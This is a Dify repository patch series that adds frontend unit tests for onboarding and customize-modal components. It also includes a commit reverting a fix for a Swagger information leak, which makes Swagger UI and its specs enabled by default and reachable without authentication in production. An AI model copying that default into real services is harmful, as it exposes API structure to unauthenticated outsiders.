expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-option.spec.tsx b/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-option.spec.tsx new file mode 100644 index 0000000000..d8ef1a3149 --- /dev/null +++ b/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-option.spec.tsx @@ -0,0 +1,348 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import StartNodeOption from './start-node-option' + +describe('StartNodeOption', () => { + const mockOnClick = jest.fn() + const defaultProps = { + icon:
Icon
, + title: 'Test Title', + description: 'Test description for the option', + onClick: mockOnClick, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Helper function to render component + const renderComponent = (props = {}) => { + return render() + } + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should render icon correctly', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('test-icon')).toBeInTheDocument() + expect(screen.getByText('Icon')).toBeInTheDocument() + }) + + it('should render title correctly', () => { + // Arrange & Act + renderComponent() + + // Assert + const title = screen.getByText('Test Title') + expect(title).toBeInTheDocument() + expect(title).toHaveClass('system-md-semi-bold') + expect(title).toHaveClass('text-text-primary') + }) + + it('should render description correctly', () => { + // Arrange & Act + renderComponent() + + // Assert + const description = screen.getByText('Test description for the option') + expect(description).toBeInTheDocument() + expect(description).toHaveClass('system-xs-regular') + expect(description).toHaveClass('text-text-tertiary') + }) + + it('should be rendered as a clickable card', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const card = container.querySelector('.cursor-pointer') + expect(card).toBeInTheDocument() + // Check that it has cursor-pointer class to indicate clickability + expect(card).toHaveClass('cursor-pointer') + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should render with subtitle when provided', () => { + // Arrange & Act + renderComponent({ subtitle: 'Optional Subtitle' }) + + // Assert + expect(screen.getByText('Optional Subtitle')).toBeInTheDocument() + }) + + it('should not render subtitle when not provided', () => { + // Arrange & Act + renderComponent() + + // Assert + const titleElement = screen.getByText('Test Title').parentElement + expect(titleElement).not.toHaveTextContent('Optional Subtitle') + }) + + it('should render subtitle with correct styling', () => { + // Arrange & Act + renderComponent({ subtitle: 'Subtitle Text' }) + + // Assert + const subtitle = screen.getByText('Subtitle Text') + expect(subtitle).toHaveClass('system-md-regular') + expect(subtitle).toHaveClass('text-text-quaternary') + }) + + it('should render custom icon component', () => { + // Arrange + const customIcon = Custom + + // Act + renderComponent({ icon: customIcon }) + + // Assert + expect(screen.getByTestId('custom-svg')).toBeInTheDocument() + }) + + it('should render long title correctly', () => { + // Arrange + const longTitle = 'This is a very long title that should still render correctly' + + // Act + renderComponent({ title: longTitle }) + + // Assert + expect(screen.getByText(longTitle)).toBeInTheDocument() + }) + + it('should render long description correctly', () => { + // Arrange + const longDescription = 'This is a very long description that explains the option in great detail and should still render correctly within the component layout' + + // Act + renderComponent({ description: longDescription }) + + // Assert + expect(screen.getByText(longDescription)).toBeInTheDocument() + }) + + it('should render with proper layout structure', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + expect(screen.getByText('Test description for the option')).toBeInTheDocument() + expect(screen.getByTestId('test-icon')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should call onClick when card is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const card = screen.getByText('Test Title').closest('div[class*="cursor-pointer"]') + await user.click(card!) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(1) + }) + + it('should call onClick when icon is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const icon = screen.getByTestId('test-icon') + await user.click(icon) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(1) + }) + + it('should call onClick when title is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const title = screen.getByText('Test Title') + await user.click(title) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(1) + }) + + it('should call onClick when description is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const description = screen.getByText('Test description for the option') + await user.click(description) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(1) + }) + + it('should handle multiple rapid clicks', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const card = screen.getByText('Test Title').closest('div[class*="cursor-pointer"]') + await user.click(card!) + await user.click(card!) + await user.click(card!) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(3) + }) + + it('should not throw error if onClick is undefined', async () => { + // Arrange + const user = userEvent.setup() + renderComponent({ onClick: undefined }) + + // Act & Assert + const card = screen.getByText('Test Title').closest('div[class*="cursor-pointer"]') + await expect(user.click(card!)).resolves.not.toThrow() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty string title', () => { + // Arrange & Act + renderComponent({ title: '' }) + + // Assert + const titleContainer = screen.getByText('Test description for the option').parentElement?.parentElement + expect(titleContainer).toBeInTheDocument() + }) + + it('should handle empty string description', () => { + // Arrange & Act + renderComponent({ description: '' }) + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should handle undefined subtitle gracefully', () => { + // Arrange & Act + renderComponent({ subtitle: undefined }) + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should handle empty string subtitle', () => { + // Arrange & Act + renderComponent({ subtitle: '' }) + + // Assert + // Empty subtitle should still render but be empty + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should handle null subtitle', () => { + // Arrange & Act + renderComponent({ subtitle: null }) + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should render with subtitle containing special characters', () => { + // Arrange + const specialSubtitle = '(optional) - [Beta]' + + // Act + renderComponent({ subtitle: specialSubtitle }) + + // Assert + expect(screen.getByText(specialSubtitle)).toBeInTheDocument() + }) + + it('should render with title and subtitle together', () => { + // Arrange & Act + const { container } = renderComponent({ + title: 'Main Title', + subtitle: 'Secondary Text', + }) + + // Assert + expect(screen.getByText('Main Title')).toBeInTheDocument() + expect(screen.getByText('Secondary Text')).toBeInTheDocument() + + // Both should be in the same heading element + const heading = container.querySelector('h3') + expect(heading).toHaveTextContent('Main Title') + expect(heading).toHaveTextContent('Secondary Text') + }) + }) + + // Accessibility Tests + describe('Accessibility', () => { + it('should have semantic heading structure', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const heading = container.querySelector('h3') + expect(heading).toBeInTheDocument() + expect(heading).toHaveTextContent('Test Title') + }) + + it('should have semantic paragraph for description', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const paragraph = container.querySelector('p') + expect(paragraph).toBeInTheDocument() + expect(paragraph).toHaveTextContent('Test description for the option') + }) + + it('should have proper cursor style for accessibility', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const card = container.querySelector('.cursor-pointer') + expect(card).toBeInTheDocument() + expect(card).toHaveClass('cursor-pointer') + }) + }) + + // Additional Edge Cases + describe('Additional Edge Cases', () => { + it('should handle click when onClick handler is missing', async () => { + // Arrange + const user = userEvent.setup() + renderComponent({ onClick: undefined }) + + // Act & Assert - Should not throw error + const card = screen.getByText('Test Title').closest('div[class*="cursor-pointer"]') + await expect(user.click(card!)).resolves.not.toThrow() + }) + }) +}) diff --git a/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-selection-panel.spec.tsx b/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-selection-panel.spec.tsx new file mode 100644 index 0000000000..5612d4e423 --- /dev/null +++ b/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-selection-panel.spec.tsx @@ -0,0 +1,586 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import StartNodeSelectionPanel from './start-node-selection-panel' +import { BlockEnum } from '@/app/components/workflow/types' + +// Mock NodeSelector component +jest.mock('@/app/components/workflow/block-selector', () => { + return function MockNodeSelector({ + open, + onOpenChange, + onSelect, + trigger, + }: any) { + // trigger is a function that returns a React element + const triggerElement = typeof trigger === 'function' ? trigger() : trigger + + return ( +
+ {triggerElement} + {open && ( +
+ + + +
+ )} +
+ ) + } +}) + +// Mock icons +jest.mock('@/app/components/base/icons/src/vender/workflow', () => ({ + Home: () =>
Home
, + TriggerAll: () =>
TriggerAll
, +})) + +describe('StartNodeSelectionPanel', () => { + const mockOnSelectUserInput = jest.fn() + const mockOnSelectTrigger = jest.fn() + + const defaultProps = { + onSelectUserInput: mockOnSelectUserInput, + onSelectTrigger: mockOnSelectTrigger, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Helper function to render component + const renderComponent = (props = {}) => { + return render() + } + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + }) + + it('should render user input option', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.userInputDescription')).toBeInTheDocument() + expect(screen.getByTestId('home-icon')).toBeInTheDocument() + }) + + it('should render trigger option', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.triggerDescription')).toBeInTheDocument() + expect(screen.getByTestId('trigger-all-icon')).toBeInTheDocument() + }) + + it('should render node selector component', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('node-selector')).toBeInTheDocument() + }) + + it('should have correct grid layout', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const grid = container.querySelector('.grid') + expect(grid).toBeInTheDocument() + expect(grid).toHaveClass('grid-cols-2') + expect(grid).toHaveClass('gap-4') + }) + + it('should not show trigger selector initially', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should accept onSelectUserInput prop', () => { + // Arrange + const customHandler = jest.fn() + + // Act + renderComponent({ onSelectUserInput: customHandler }) + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + }) + + it('should accept onSelectTrigger prop', () => { + // Arrange + const customHandler = jest.fn() + + // Act + renderComponent({ onSelectTrigger: customHandler }) + + // Assert + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + }) + + it('should handle missing onSelectUserInput gracefully', () => { + // Arrange & Act + expect(() => { + renderComponent({ onSelectUserInput: undefined }) + }).not.toThrow() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + }) + + it('should handle missing onSelectTrigger gracefully', () => { + // Arrange & Act + expect(() => { + renderComponent({ onSelectTrigger: undefined }) + }).not.toThrow() + + // Assert + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + }) + }) + + // User Interactions - User Input Option + describe('User Interactions - User Input', () => { + it('should call onSelectUserInput when user input option is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + + // Assert + expect(mockOnSelectUserInput).toHaveBeenCalledTimes(1) + }) + + it('should not call onSelectTrigger when user input option is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + + // Assert + expect(mockOnSelectTrigger).not.toHaveBeenCalled() + }) + + it('should handle multiple clicks on user input option', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + await user.click(userInputOption) + await user.click(userInputOption) + + // Assert + expect(mockOnSelectUserInput).toHaveBeenCalledTimes(3) + }) + }) + + // User Interactions - Trigger Option + describe('User Interactions - Trigger', () => { + it('should show trigger selector when trigger option is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Assert + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + }) + + it('should not call onSelectTrigger immediately when trigger option is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Assert + expect(mockOnSelectTrigger).not.toHaveBeenCalled() + }) + + it('should call onSelectTrigger when a trigger is selected from selector', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open trigger selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Select a trigger + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + const scheduleButton = screen.getByTestId('select-schedule') + await user.click(scheduleButton) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenCalledTimes(1) + expect(mockOnSelectTrigger).toHaveBeenCalledWith(BlockEnum.TriggerSchedule, undefined) + }) + + it('should call onSelectTrigger with correct node type for webhook', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open trigger selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Select webhook trigger + await waitFor(() => { + expect(screen.getByTestId('select-webhook')).toBeInTheDocument() + }) + const webhookButton = screen.getByTestId('select-webhook') + await user.click(webhookButton) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenCalledTimes(1) + expect(mockOnSelectTrigger).toHaveBeenCalledWith(BlockEnum.TriggerWebhook, undefined) + }) + + it('should hide trigger selector after selection', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open trigger selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Select a trigger + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + const scheduleButton = screen.getByTestId('select-schedule') + await user.click(scheduleButton) + + // Assert - Selector should be hidden + await waitFor(() => { + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + }) + + it('should pass tool config parameter through onSelectTrigger', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open trigger selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Select a trigger (our mock doesn't pass toolConfig, but real NodeSelector would) + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + const scheduleButton = screen.getByTestId('select-schedule') + await user.click(scheduleButton) + + // Assert - Verify handler was called + // In real usage, NodeSelector would pass toolConfig as second parameter + expect(mockOnSelectTrigger).toHaveBeenCalled() + }) + }) + + // State Management + describe('State Management', () => { + it('should toggle trigger selector visibility', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Assert - Initially hidden + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + + // Act - Show selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Assert - Now visible + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + + // Act - Close selector + const closeButton = screen.getByTestId('close-selector') + await user.click(closeButton) + + // Assert - Hidden again + await waitFor(() => { + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + }) + + it('should maintain state across user input selections', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Click user input multiple times + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + await user.click(userInputOption) + + // Assert - Trigger selector should remain hidden + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + + it('should reset trigger selector visibility after selection', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open and select trigger + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + const scheduleButton = screen.getByTestId('select-schedule') + await user.click(scheduleButton) + + // Assert - Selector should be closed + await waitFor(() => { + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + + // Act - Click trigger option again + await user.click(triggerOption) + + // Assert - Selector should open again + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle rapid clicks on trigger option', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + await user.click(triggerOption) + await user.click(triggerOption) + + // Assert - Should still be open (last click) + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + }) + + it('should handle selecting different trigger types in sequence', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open and select schedule + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + await waitFor(() => { + expect(screen.getByTestId('select-schedule')).toBeInTheDocument() + }) + await user.click(screen.getByTestId('select-schedule')) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenNthCalledWith(1, BlockEnum.TriggerSchedule, undefined) + + // Act - Open again and select webhook + await user.click(triggerOption) + await waitFor(() => { + expect(screen.getByTestId('select-webhook')).toBeInTheDocument() + }) + await user.click(screen.getByTestId('select-webhook')) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenNthCalledWith(2, BlockEnum.TriggerWebhook, undefined) + expect(mockOnSelectTrigger).toHaveBeenCalledTimes(2) + }) + + it('should not crash with undefined callbacks', async () => { + // Arrange + const user = userEvent.setup() + renderComponent({ + onSelectUserInput: undefined, + onSelectTrigger: undefined, + }) + + // Act & Assert - Should not throw + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await expect(user.click(userInputOption)).resolves.not.toThrow() + }) + + it('should handle opening and closing selector without selection', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Open selector + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Act - Close without selecting + await waitFor(() => { + expect(screen.getByTestId('close-selector')).toBeInTheDocument() + }) + await user.click(screen.getByTestId('close-selector')) + + // Assert - No selection callback should be called + expect(mockOnSelectTrigger).not.toHaveBeenCalled() + + // Assert - Selector should be closed + await waitFor(() => { + expect(screen.queryByTestId('node-selector-content')).not.toBeInTheDocument() + }) + }) + }) + + // Accessibility Tests + describe('Accessibility', () => { + it('should have both options visible and accessible', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeVisible() + expect(screen.getByText('workflow.onboarding.trigger')).toBeVisible() + }) + + it('should have descriptive text for both options', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.userInputDescription')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.triggerDescription')).toBeInTheDocument() + }) + + it('should have icons for visual identification', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('home-icon')).toBeInTheDocument() + expect(screen.getByTestId('trigger-all-icon')).toBeInTheDocument() + }) + + it('should maintain focus after interactions', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + + // Assert - Component should still be in document + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + }) + }) + + // Integration Tests + describe('Integration', () => { + it('should coordinate between both options correctly', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Click user input + const userInputOption = screen.getByText('workflow.onboarding.userInputFull') + await user.click(userInputOption) + + // Assert + expect(mockOnSelectUserInput).toHaveBeenCalledTimes(1) + expect(mockOnSelectTrigger).not.toHaveBeenCalled() + + // Act - Click trigger + const triggerOption = screen.getByText('workflow.onboarding.trigger') + await user.click(triggerOption) + + // Assert - Trigger selector should open + await waitFor(() => { + expect(screen.getByTestId('node-selector-content')).toBeInTheDocument() + }) + + // Act - Select trigger + await user.click(screen.getByTestId('select-schedule')) + + // Assert + expect(mockOnSelectTrigger).toHaveBeenCalledTimes(1) + expect(mockOnSelectUserInput).toHaveBeenCalledTimes(1) + }) + + it('should render all components in correct hierarchy', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const grid = container.querySelector('.grid') + expect(grid).toBeInTheDocument() + + // Both StartNodeOption components should be rendered + expect(screen.getByText('workflow.onboarding.userInputFull')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.trigger')).toBeInTheDocument() + + // NodeSelector should be rendered + expect(screen.getByTestId('node-selector')).toBeInTheDocument() + }) + }) +}) From a915b8a584e8c51851e81e20551dd0c03fb56bb6 Mon Sep 17 00:00:00 2001 From: crazywoola <100913391+crazywoola@users.noreply.github.com> Date: Tue, 16 Dec 2025 14:19:33 +0800 Subject: [PATCH 47/68] revert: "security/fix-swagger-info-leak-m02" (#29721) --- api/.env.example | 12 +----------- api/configs/feature/__init__.py | 33 +++------------------------------ api/extensions/ext_login.py | 4 ++-- api/libs/external_api.py | 20 ++------------------ 4 files changed, 8 insertions(+), 61 deletions(-) diff --git a/api/.env.example b/api/.env.example index 8c4ea617d4..ace4c4ea1b 100644 --- a/api/.env.example +++ b/api/.env.example @@ -626,17 +626,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -# SECURITY: Swagger UI is automatically disabled in PRODUCTION environment (DEPLOY_ENV=PRODUCTION) -# to prevent API information disclosure. -# -# Behavior: -# - DEPLOY_ENV=PRODUCTION + SWAGGER_UI_ENABLED not set -> Swagger DISABLED (secure default) -# - DEPLOY_ENV=DEVELOPMENT/TESTING + SWAGGER_UI_ENABLED not set -> Swagger ENABLED -# - SWAGGER_UI_ENABLED=true -> Swagger ENABLED (overrides environment check) -# - SWAGGER_UI_ENABLED=false -> Swagger DISABLED (explicit disable) -# -# For development, you can uncomment below or set DEPLOY_ENV=DEVELOPMENT -# SWAGGER_UI_ENABLED=false +SWAGGER_UI_ENABLED=true SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index b9091b5e2f..e16ca52f46 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -1252,19 +1252,9 @@ class WorkflowLogConfig(BaseSettings): class SwaggerUIConfig(BaseSettings): - """ - Configuration for Swagger UI documentation. - - Security Note: Swagger UI is automatically disabled in PRODUCTION environment - to prevent API information disclosure. Set SWAGGER_UI_ENABLED=true explicitly - to enable in production if needed. - """ - - SWAGGER_UI_ENABLED: bool | None = Field( - description="Whether to enable Swagger UI in api module. " - "Automatically disabled in PRODUCTION environment for security. " - "Set to true explicitly to enable in production.", - default=None, + SWAGGER_UI_ENABLED: bool = Field( + description="Whether to enable Swagger UI in api module", + default=True, ) SWAGGER_UI_PATH: str = Field( @@ -1272,23 +1262,6 @@ class SwaggerUIConfig(BaseSettings): default="/swagger-ui.html", ) - @property - def swagger_ui_enabled(self) -> bool: - """ - Compute whether Swagger UI should be enabled. - - If SWAGGER_UI_ENABLED is explicitly set, use that value. - Otherwise, disable in PRODUCTION environment for security. - """ - if self.SWAGGER_UI_ENABLED is not None: - return self.SWAGGER_UI_ENABLED - - # Auto-disable in production environment - import os - - deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION") - return deploy_env.upper() != "PRODUCTION" - class TenantIsolatedTaskQueueConfig(BaseSettings): TENANT_ISOLATED_TASK_CONCURRENCY: int = Field( diff --git a/api/extensions/ext_login.py b/api/extensions/ext_login.py index 5cbdd4db12..74299956c0 100644 --- a/api/extensions/ext_login.py +++ b/api/extensions/ext_login.py @@ -22,8 +22,8 @@ login_manager = flask_login.LoginManager() @login_manager.request_loader def load_user_from_request(request_from_flask_login): """Load user based on the request.""" - # Skip authentication for documentation endpoints (only when Swagger is enabled) - if dify_config.swagger_ui_enabled and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")): + # Skip authentication for documentation endpoints + if dify_config.SWAGGER_UI_ENABLED and request.path.endswith((dify_config.SWAGGER_UI_PATH, "/swagger.json")): return None auth_token = extract_access_token(request) diff --git a/api/libs/external_api.py b/api/libs/external_api.py index 31ca2b3e08..61a90ee4a9 100644 --- a/api/libs/external_api.py +++ b/api/libs/external_api.py @@ -131,28 +131,12 @@ class ExternalApi(Api): } def __init__(self, app: Blueprint | Flask, *args, **kwargs): - import logging - import os - kwargs.setdefault("authorizations", self._authorizations) kwargs.setdefault("security", "Bearer") - - # Security: Use computed swagger_ui_enabled which respects DEPLOY_ENV - swagger_enabled = dify_config.swagger_ui_enabled - kwargs["add_specs"] = swagger_enabled - kwargs["doc"] = dify_config.SWAGGER_UI_PATH if swagger_enabled else False + kwargs["add_specs"] = dify_config.SWAGGER_UI_ENABLED + kwargs["doc"] = dify_config.SWAGGER_UI_PATH if dify_config.SWAGGER_UI_ENABLED else False # manual separate call on construction and init_app to ensure configs in kwargs effective super().__init__(app=None, *args, **kwargs) self.init_app(app, **kwargs) register_external_error_handlers(self) - - # Security: Log warning when Swagger is enabled in production environment - deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION") - if swagger_enabled and deploy_env.upper() == "PRODUCTION": - logger = logging.getLogger(__name__) - logger.warning( - "SECURITY WARNING: Swagger UI is ENABLED in PRODUCTION environment. " - "This may expose sensitive API documentation. " - "Set SWAGGER_UI_ENABLED=false or remove the explicit setting to disable." - ) From 240e1d155ae00ad0c8f9236d2a1285b7b4b0ad85 Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Tue, 16 Dec 2025 14:21:05 +0800 Subject: [PATCH 48/68] test: add comprehensive tests for CustomizeModal component (#29709) --- web/AGENTS.md | 1 + web/CLAUDE.md | 1 + web/app/components/app/overview/app-card.tsx | 1 - .../app/overview/customize/index.spec.tsx | 434 ++++++++++++++++++ .../app/overview/customize/index.tsx | 1 - 5 files changed, 436 insertions(+), 2 deletions(-) create mode 120000 web/CLAUDE.md create mode 100644 web/app/components/app/overview/customize/index.spec.tsx diff --git a/web/AGENTS.md b/web/AGENTS.md index 70e251b738..7362cd51db 100644 --- a/web/AGENTS.md +++ b/web/AGENTS.md @@ -2,3 +2,4 @@ - Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests. - When proposing or saving tests, re-read that document and follow every requirement. +- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance. diff --git a/web/CLAUDE.md b/web/CLAUDE.md new file mode 120000 index 0000000000..47dc3e3d86 --- /dev/null +++ b/web/CLAUDE.md @@ -0,0 +1 @@ +AGENTS.md \ No newline at end of file diff --git a/web/app/components/app/overview/app-card.tsx b/web/app/components/app/overview/app-card.tsx index a0f5780b71..15762923ff 100644 --- a/web/app/components/app/overview/app-card.tsx +++ b/web/app/components/app/overview/app-card.tsx @@ -401,7 +401,6 @@ function AppCard({ /> setShowCustomizeModal(false)} appId={appInfo.id} api_base_url={appInfo.api_base_url} diff --git a/web/app/components/app/overview/customize/index.spec.tsx b/web/app/components/app/overview/customize/index.spec.tsx new file mode 100644 index 0000000000..c960101b66 --- /dev/null +++ b/web/app/components/app/overview/customize/index.spec.tsx @@ -0,0 +1,434 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CustomizeModal from './index' +import { AppModeEnum } from '@/types/app' + +// Mock useDocLink from context +const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`) +jest.mock('@/context/i18n', () => ({ + useDocLink: () => mockDocLink, +})) + +// Mock window.open +const mockWindowOpen = jest.fn() +Object.defineProperty(window, 'open', { + value: mockWindowOpen, + writable: true, +}) + +describe('CustomizeModal', () => { + const defaultProps = { + isShow: true, + onClose: jest.fn(), + api_base_url: 'https://api.example.com', + appId: 'test-app-id-123', + mode: AppModeEnum.CHAT, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests - verify component renders correctly with various configurations + describe('Rendering', () => { + it('should render without crashing when isShow is true', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + }) + + it('should not render content when isShow is false', async () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument() + }) + }) + + it('should render modal description', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument() + }) + }) + + it('should render way 1 and way 2 tags', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument() + }) + }) + + it('should render all step numbers (1, 2, 3)', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + expect(screen.getByText('2')).toBeInTheDocument() + expect(screen.getByText('3')).toBeInTheDocument() + 